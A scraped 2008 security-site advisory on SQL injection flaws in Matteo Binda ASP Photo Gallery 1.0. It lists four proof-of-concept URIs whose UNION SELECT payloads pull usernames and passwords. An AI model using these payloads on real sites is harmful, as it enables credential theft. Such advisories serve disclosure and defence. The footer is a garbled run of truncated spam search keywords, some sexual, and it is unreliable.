about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Matteo Binda ASP Photo Gallery Multiple SQL Injection Vulnerabilities


Title Matteo Binda ASP Photo Gallery Multiple SQL Injection Vulnerabilities
Published 2008-01-12-12:00AM
Updated 2008-01-14-09:48PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Ruben Ventura Pina is credited with the discovery of these vulnerabilities.
Vulnerable  Matteo Binda ASP Photo Gallery 1.0
Not Vulnerable  
Code  An attacker can exploit these issues via a browser.The following proof-of-concept URIs are available:http://www.example.com/Imgbig.asp?Id='union select user as name,1,pass as descrizione from stuff where '1'='1http://www.example.com/thumbricerca.asp?id=-1'union select user as name,1,pass as descrizione from stuff where 1 like http://www.example.com/thumbricerca.asp?ricerca=-1'union select user as name,1,pass as descrizione from stuff where 1 likhttp://www.example.com/thumb.asp?id=' union select user as name,1,pass as descrizione from stuff where '1'='1
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 19:47:43 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
pho se php-nuke 2 dj2010.com joyangeles /index2.ph Dirtysluts KASTURI WWW.PLAYBO preity zin Cross Site spaw www.hi5.co saxe .lk WWW.PLAYBO www.epaper indian six www.sexypi php-nuke+p Teens for bigboob xnxx.hidge WWW.Sexw www.onetwo free sex p htp://ww8. indian sex www.Sex.Ne thiresha s , WWW.Sexw phon Erot Www.sexsex Wap Phoner feer Trisa+sex tv sex liv comparison Movissex p cellufun Www.Kajol phpAdsNew jana www.591200 Movissex+p Flicks.com Download+s free sex m melayuboge xxx fuck v sexwallpap